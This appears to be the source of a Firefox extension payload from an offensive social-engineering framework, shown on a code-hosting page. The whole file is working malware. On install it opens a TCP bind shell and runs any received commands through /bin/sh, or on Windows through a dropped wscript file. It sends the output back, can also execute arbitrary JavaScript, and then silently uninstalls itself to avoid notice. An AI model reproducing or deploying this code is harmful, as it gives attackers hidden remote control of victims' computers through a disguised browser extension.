Path: blob/master/modules/social_engineering/firefox_extension_bindshell/extension/bootstrap.js
1154 views
1function startup(data, reason) {2var file = Components.classes["@mozilla.org/file/directory_service;1"].3getService(Components.interfaces.nsIProperties).4get("ProfD", Components.interfaces.nsIFile);5file.append("extensions");6xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";7file.append(xpi_guid);89// # ./msfpayload firefox/shell_bind_tcp LPORT=1337 R10(function(){11Components.utils.import("resource://gre/modules/NetUtil.jsm");12var lport = __bindshell_port_placeholder__;13var rhost = "";14var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]15.createInstance(Components.interfaces.nsIServerSocket);16serverSocket.init(lport, false, -1);1718var listener = {19onSocketAccepted: function(serverSocket, clientSocket) {20var outStream = clientSocket.openOutputStream(0, 0, 0);21var inStream = clientSocket.openInputStream(0, 0, 0);22var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]23.createInstance(Components.interfaces.nsIInputStreamPump);24pump.init(inStream, -1, -1, 0, 0, true);25pump.asyncRead(clientListener(outStream), null);26}27};2829var clientListener = function(outStream) {30return {31onStartRequest: function(request, context) {},32onStopRequest: function(request, context) {},33onDataAvailable: function(request, context, stream, offset, count) {34var data = NetUtil.readInputStreamToString(stream, count).trim();35runCmd(data, function(err, output) {36if(!err) outStream.write(output, output.length);37});38}39};40};41424344var readFile = function(path) {45try {46var file = Components.classes["@mozilla.org/file/local;1"]47.createInstance(Components.interfaces.nsILocalFile);48file.initWithPath(path);4950var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]51.createInstance(Components.interfaces.nsIFileInputStream);52fileStream.init(file, 1, 0, false);5354var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]55.createInstance(Components.interfaces.nsIBinaryInputStream);56binaryStream.setInputStream(fileStream);57var array = binaryStream.readByteArray(fileStream.available());5859binaryStream.close();60fileStream.close();61file.remove(true);6263return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");64} catch (e) { return ""; }65};666768var setTimeout = function(cb, delay) {69var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);70timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);71return timer;72};737475var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]76.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;77var windows = (ua.indexOf("Windows")>-1);78var svcs = Components.utils.import("resource://gre/modules/Services.jsm");79var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src;80var runCmd = function(cmd, cb) {81cb = cb || (function(){});8283if (cmd.trim().length == 0) {84setTimeout(function(){ cb("Command is empty string ('')."); });85return;86}8788var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());89if (js) {90var tag = "[!JAVASCRIPT]";91var sync = true; // avoid zalgo's reach92var sent = false;93var retVal = null;9495try {96retVal = Function('send', js[1])(function(r){97if (sent) return;98sent = true99if (r) {100if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });101else cb(false, r+tag+"\n");102}103});104} catch (e) { retVal = e.message; }105106sync = false;107108if (retVal && !sent) {109sent = true;110setTimeout(function(){ cb(false, retVal+tag+"\n"); });111}112113return;114}115116var shEsc = "\\$&";117var shPath = "/bin/sh -c"118119if (windows) {120shPath = "cmd /c";121shEsc = "\^$&";122var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]123.getService(Components.interfaces.nsIProperties)124.get("TmpD", Components.interfaces.nsIFile);125jscriptFile.append('I5yOzt1neFMfjSYjyY.js');126var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]127.createInstance(Components.interfaces.nsIFileOutputStream);128stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);129stream.write(jscript, jscript.length);130if (stream instanceof Components.interfaces.nsISafeOutputStream) {131stream.finish();132} else {133stream.close();134}135}136137var stdoutFile = "JKsYPvN0AOYtet5mnB";138139var stdout = Components.classes["@mozilla.org/file/directory_service;1"]140.getService(Components.interfaces.nsIProperties)141.get("TmpD", Components.interfaces.nsIFile);142stdout.append(stdoutFile);143144if (windows) {145var shell = shPath+" "+cmd;146shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";147var b64 = svcs.btoa(shell);148} else {149var shell = shPath+" "+cmd.replace(/\W/g, shEsc);150shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";151}152var process = Components.classes["@mozilla.org/process/util;1"]153.createInstance(Components.interfaces.nsIProcess);154var sh = Components.classes["@mozilla.org/file/local;1"]155.createInstance(Components.interfaces.nsILocalFile);156157if (windows) {158sh.initWithPath("C:\\Windows\\System32\\wscript.exe");159process.init(sh);160var args = [jscriptFile.path, b64];161process.run(true, args, args.length);162jscriptFile.remove(true);163setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});164} else {165sh.initWithPath("/bin/sh");166process.init(sh);167var args = ["-c", shell];168process.run(true, args, args.length);169setTimeout(function(){cb(false, readFile(stdout.path));});170}171};172173174serverSocket.asyncListen(listener);175})();176177178try { // Fx < 4.0179Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);180} catch (e) {}181try { // Fx 4.0 and later182Components.utils.import("resource://gre/modules/AddonManager.jsm");183AddonManager.getAddonByID(xpi_guid, function(addon) {184addon.uninstall();185});186} catch (e) {}187}188189190